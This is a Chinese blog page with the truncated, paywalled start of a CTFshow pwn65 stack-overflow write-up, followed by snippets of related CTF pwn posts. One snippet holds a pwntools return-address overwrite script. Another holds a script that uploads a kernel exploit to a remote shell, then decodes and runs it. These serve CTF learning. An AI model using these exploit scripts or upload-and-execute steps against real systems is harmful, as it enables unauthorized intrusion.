CTFshow-PWN-栈溢出(pwn65 详细版)

原创 于 2025-07-14 17:16:07 发布 · 1.5k 阅读 · 20 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #CTF #安全 #pwn #shellcode #alpha3

PWN67 专栏收录该内容
36 篇文章 ¥99.90 ¥299.90
订阅专栏

检查一下:64 位程序,存在 PIE 保护,程序中存在 RWX 段

无法反编译

直接看汇编

调用 read 读取 0x400 到 buf

如果读入数据长度大于 0 就跳转到 loc_11AC

否则跳到 locret_1254,函数直接结束

可以看到 loc_11AC 中 将 var_4 置零后,跳到 loc_123A

继续看 loc_123A,判断 0 是否小于读入字节数,满足则跳转到 loc_11B8

了解本专栏 订阅专栏 解锁全文
CTFshow-PWN-栈溢出pwn49)两种方法+动调分析
Welcome To My6n Blog
06-09 1574
执行后,可以看到 0x80da000 往后部分为可读可写可执行权限。看似开了 canary 保护,实际没有,是 checksec 本太老了,检测到 __stack_chk_fail 函数就算开了。看似和上一题一模一样,但是细心的小朋友应该注意到了,左边多出了很多函数,说明这个程序是静态链接的,静态链接就意味着没法去打 ret2libc了,还是无 system 无 /bin/sh,考虑打 ret2syscall。
CTFshow-PWN-栈溢出pwn60-pwn61)
Welcome To My6n Blog
07-08 1001
摘要:本文分析了两个CTF pwn题目的解题过程。第一个32位程序(pwn60)存在RWX段和栈溢出漏洞,通过将shellcode写入.bss段并跳转执行成功getshell。第二个64位程序(pwn61)虽然开启了PIE保护,但通过printf泄露栈地址,由于shellcode空间不足,改用将shellcode写入栈中不受影响的偏移位置(v5_addr+0x20)成功执行。两个题目分别通过远程攻击获得flag:ctfshow{9129ee6c-b09e-47b8-addd-9accb8932587}和ct
CTFshow-PWN入门-前置基础-全篇
weixin_63576152的博客
07-31 5759
本文主要详解CTFshowpwn入门系列的前置基础模块,共30道题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope的博客以下操作中小编用的都是自己的kali环境。
CTF | pwn篇】ctfshow pwn刷题记录
序章的博客
04-18 1062
栈溢出漏洞分析报告 摘要 本报告分析了三个存在栈溢出漏洞的CTF题目(pwn_035、pwn_036和pwn_037)pwn_035通过strcpy函数未验证输入大小导致栈溢出,触发信号处理函数打印flag;pwn_036存在未保护的栈和显式后门函数,可直接覆盖返回地址跳转到后门;pwn_037同样存在栈溢出漏洞,可利用system("/bin/sh")后门函数获取shell。三个案例展示了栈溢出的不同利用方式,包括触发异常处理、直接跳转后门函数等技巧。
CTF PWN简单栈溢出
2301_81031055的博客
01-25 741
(mov esp,ebp)意思是先将ebp赋给esp,此时esp与ebp位于同一个地址,可以把它们现在指向的那个地址,既可以当成栈顶又可以当成是栈底。因为填充的数据后面跟的就是栈,所以它会将栈地址顺带打印出来,接下来我们继续编写脚本。到这里,我们的第一次输入就算完成了,在第二次输入的时候就能去构造payload。(此时栈顶的内容也就是ebp的内容,也就是说现在把ebp的内容赋给了esp)在这里我们发现有system函数,我们可以利用system函数的plt表。我们会发现溢出字节较少,考虑用栈溢出解题。
ctfshow-pwn新手系列
热门推荐
ro4lsc的博客
06-14 1万+
前言 十几天没发文了,都在写这篇文章,我也不知道为啥我要学pwn,当初是准备学汇编的,走上了不归之路,呜呜呜 pwn签到题 nc 连上就有flag pwn02 一个简单的ret2text 首先看main函数 那么接着跟到pwnme函数 可以看到buf只有9个字节 而fgets读入了50个字节,所以就导致了栈溢出 这是个32位的程序所以ret地址一般是ebp+4 看到stack函数 地址 故exp为 exp: from pwn import * #p = process("./pwn1") p
CTF——PWN——栈溢出(1.woof)
qq_45215609的博客
09-10 773
CTF——PWN——栈溢出(1.woof)
CTF——PWN——栈溢出3.Easy_ShellCode
qq_45215609的博客
09-18 964
CTF——PWN——栈溢出3.Easy_ShellCode),bss段上的ret2shellcode
CTF中的PWN——无安全防护(栈溢出
壊壊的诱惑你的博客
09-20 2999
前言 今天心情不错,人最大的敌人真的就是自己!!! 好久没学PWN和逆向了,今天写一篇关于CTFPWN的文章回忆一下。本文主要讲的是利用栈溢出的基础PWN,分别有使用shellcode类型、满足函数条件类型及使用软件自带system函数类型,其中自带system函数的类型软件因为传参方式不同进而分为32bit与64bit的软件。 满足函数条件类型 很low的命名...
CTFshow-PWN入门-栈溢出pwn35~pwn40
weixin_63576152的博客
08-22 1748
本文主要详解CTFshowpwn入门系列的栈溢出模块的前6题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope参考文章:以下操作中小编用的都是自己的kali环境。
CTFshow-pwn入门-栈溢出pwn43-pwn44
你们de4月天的博客
12-27 2039
CTFshow-pwn入门-栈溢出pwn43-pwn44
ctf(pwn)栈溢出介绍
半岛铁盒的博客
03-05 1849
栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致 与其相邻的栈中的变量的值被改变。这种问题是一种特定的缓冲区溢出漏洞,类似的还有堆溢出,bss 段溢出等溢出方式。栈溢出漏洞轻则可以使程序崩溃,重则可以使攻击者控制程序执行流程。此外,我们也不难发现,发生栈溢出的基本前提是 程序必须向栈上写入数据。 写入的数据大小没有被良好地控制。 一般来说,我们会有如下的覆盖需求 覆盖函数返回地址,这时候就是直接看 EBP 即可。 覆盖栈上某个变量的内容,这时候就需要更加精细的.
ctfshow--pwn入门--栈溢出
pandasaymmm的博客
06-21 443
这题像极了pwn23 代码就是判断我们输入的参数是否大于1,如果大于1进入ctfshow()函数并且将我们输入的第一个参数作为ctfshow函数的参数。ctfshow函数用到了strcpy()函数,而这个函数是可以发生溢出的。
ctfshow pwn
zip471642048的博客
06-04 694
ctfshow pwn系列
CTFSHOW-PWN入门-栈溢出35-42)
2402_84585385的博客
10-09 1189
发现hint函数中存在system函数,useful函数存在sh,根据题目的提示得知或许sh可以替代bin/sh,找到sh的地址为0x80487BA。发现hint函数中存在system函数,useful函数存在sh,根据题目的提示得知或许sh可以替代bin/sh,找到sh的地址为0x400872。ctfshow函数中的,v1大小为14,而read函数读取大小为50,所以read函数存在栈溢出,使用cyclic计算栈偏移量为22。ctfshow函数中的read函数存在栈溢出,cyclic计算栈偏移量为18。
ctfshow pwn1
qq_39980610的博客
08-19 497
pwn1
简单的CTF pwn栈溢出 (超级超级详细)
2402_88130150的博客
05-23 1209
思路:看主函数,没东西,只有func(),所以点击func()看此函数内容,发现注入点gets(),触发flag点,v2==11.281125。思路:进入main,注入点read()(限制16位字符),获取flag,backdoor()函数。思路:进入main函数,进入vulnerable_function()函数,发现注入点,read()(读入512个字符到buf),思路:点main,发现vuin(),进去看,发现注入点fget(),限制32字符,flag获得函数,边框中get_flag。
PWN栈溢出
u012173720的博客
11-21 1715
Shellcode --修改返回地址,让其指向溢出数据中的一段指令 根据上面副标题的说明,要完成的任务包括:在溢出数据内包含一段攻击指令,用攻击指令的起始地址覆盖掉返回地址。攻击指令一般都是用来打开 shell,从而可以获得当前进程的控制权,所以这类指令片段也被成为“shellcode”。shellcode 可以用汇编语言来写再转成对应的机器码,也可以上网搜索直接复制粘贴,这里就不再赘述。下面...
CTFshow——Pwn(1)
Y_peak的博客
02-24 540
CTFshow——Pwn(1) 有点懒不想写write up了。只有exploit。 PWN签到题 from pwn import * p = remote('xxx',xxx) p.interactive() pwn02 from pwn import * p =remote("pwn.chall.ctf.show",28006) p.sendline('a'*(0x9+4) + p32(0x0804850F)) p.interactive() pwn03 from pwn import * from
ctfshow-pwn题wp
最新发布
09-17
CTFShow平台PWN题的解题思路和过程在不同题目中有所不同。以CTFSHOW PWN02为例,解题脚本通过`pwn`库进行操作。脚本根据`contect`变量的值来选择是本地运行程序还是远程连接目标服务器。构造了长度为13个字节的`a`字符的`payload`,并拼接上函数地址`0X804850F`,将其发送给目标程序,最后进入交互模式与程序进行交互,可能是通过溢出覆盖返回地址来执行指定函数,以达到解题目的[^1]。 对于CTFShow PWN入门的Kernel PWN 356 - 360相关题目,解题脚本先将本地的`exp`文件内容进行Base64编码,然后分块发送到远程服务器上的`/tmp/b64_exp`文件中。接着将Base64编码的内容解码成可执行文件`/tmp/exploit`,为其添加执行权限,最后执行该文件并进入交互模式。该过程可能是利用内核漏洞,通过上传并执行本地编写的漏洞利用脚本,来获取远程服务器的控制权[^3]。 ### 代码示例 CTFSHOW PWN02解题脚本: ```python from pwn import * contect = 1 def main(): if contect == 0: p = process("./stack") else: p = remote("pwn.challenge.ctf.show", 28103) payload = b'a' * 13 payload += p32(0X804850F) p.sendline(payload) p.interactive() main() ``` CTFShow PWN入门Kernel PWN相关题目的解题脚本: ```python from pwn import * import base64 context.log_level = "debug" with open("./exp", "rb") as f: exp = base64.b64encode(f.read()) p = remote("pwn.challenge.ctf.show", 28304) p.recvuntil(b"$ ") p.sendline(b"ls") count = 0 for i in range(0, len(exp), 0x200): p.recvuntil(b"/ $ ") p.sendline("echo -n \"" + exp[i:i + 0x200].decode() + "\" >> /tmp/b64_exp") count += 1 log.info("count: " + str(count)) p.sendline("cat /tmp/b64_exp | base64 -d > /tmp/exploit") p.sendline("chmod +x /tmp/exploit") p.sendline("/tmp/exploit ") p.interactive() ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

My6n

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值